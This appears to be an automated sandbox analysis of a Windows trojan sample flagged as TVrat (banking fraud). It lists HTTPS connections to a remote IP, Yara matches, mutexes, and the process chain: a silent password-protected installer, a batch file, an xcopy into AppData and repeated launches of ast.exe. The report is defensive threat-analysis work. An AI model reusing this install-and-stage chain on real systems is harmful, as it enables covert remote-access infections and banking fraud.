                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49977 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49980 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49986 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49989 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49992 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49995 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:49998 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50001 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50004 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50007 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50010 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50013 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50016 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50019 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50022 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50025 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50028 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50031 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50034 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50040 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50043 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50046 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50049 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50052 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50055 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50058 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50064 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50067 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50070 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50073 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50076 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50079 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50082 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50085 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50088 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50091 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50094 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50097 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50100 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50103 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50106 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50109 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50112 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50115 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50118 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50121 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50124 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50127 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50130 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50133 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50139 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50142 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50145 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50148 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50151 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50154 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50157 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50157 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50160 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50163 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.5:50166 version: TLS 1.2
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED

                          E-Banking Fraud

                          barindex
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B778010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,10_2_6B778010
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B79FEF010_2_6B79FEF0
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B796EF010_2_6B796EF0
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B772D2010_2_6B772D20
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B77738010_2_6B777380
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B79117010_2_6B791170
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7A6F4010_2_6B7A6F40
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B77773010_2_6B777730
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B79A79010_2_6B79A790
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B77EEA010_2_6B77EEA0
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7A75D010_2_6B7A75D0
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7CBCF010_2_6B7CBCF0
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B79DCD010_2_6B79DCD0
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E218FA11_2_61E218FA
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E4100E11_2_61E4100E
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E2780811_2_61E27808
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E292FF11_2_61E292FF
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E15A8311_2_61E15A83
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E4E29411_2_61E4E294
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E38D3B11_2_61E38D3B
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E4151E11_2_61E4151E
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E23C3611_2_61E23C36
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E3BF8511_2_61E3BF85
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E1F6C511_2_61E1F6C5
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E1CE5B11_2_61E1CE5B
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: String function: 6B7A06B0 appears 83 times
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: String function: 6B7A05D0 appears 122 times
                          Source: aeyh21MAtA.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: aeyh21MAtA.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: aeyh21MAtA.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: aeyh21MAtA.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: aeyh21MAtA.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: aeyh21MAtA.exe, 00000000.00000003.2076256080.0000000002553000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs aeyh21MAtA.exe
                          Source: aeyh21MAtA.exe, 00000000.00000003.2076621419.000000007FE3F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs aeyh21MAtA.exe
                          Source: aeyh21MAtA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: classification engineClassification label: mal88.troj.evad.winEXE@16/65@2/2
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_3_070013E5 CreateToolhelp32Snapshot,Process32First,Process32Next,Sleep,11_3_070013E5
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkwrNDE3088FE-2234-4D4D-9206-D65E12CF2A75
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkslNDE3088FE-2234-4D4D-9206-D65E12CF2A75
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeMutant created: \Sessions\1\BaseNamedObjects\NULL
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeMutant created: \Sessions\1\BaseNamedObjects\3 @
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\02CC837A-11F4-4C58-AE40-A04E18FF470DE1
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeMutant created: \Sessions\1\BaseNamedObjects\U SVW3 E E E
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeFile created: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmpJump to behavior
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\u7i3kw\9vsl3c.bat""
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                          Source: aeyh21MAtA.exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeFile read: C:\Users\user\Desktop\aeyh21MAtA.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\aeyh21MAtA.exe "C:\Users\user\Desktop\aeyh21MAtA.exe"
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp "C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp" /SL5="$20454,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe"
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess created: C:\Users\user\Desktop\aeyh21MAtA.exe "C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeProcess created: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp "C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp" /SL5="$20464,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\u7i3kw\9vsl3c.bat""
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\u7i3kw\*" "C:\Users\user\AppData\Roaming\template\"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\template\ast.exe "C:\Users\user\AppData\Roaming\template\ast.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\template\ast.exe "C:\Users\user\AppData\Roaming\template\ast.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\template\ast.exe "C:\Users\user\AppData\Roaming\template\ast.exe"
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp "C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp" /SL5="$20454,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe" Jump to behavior
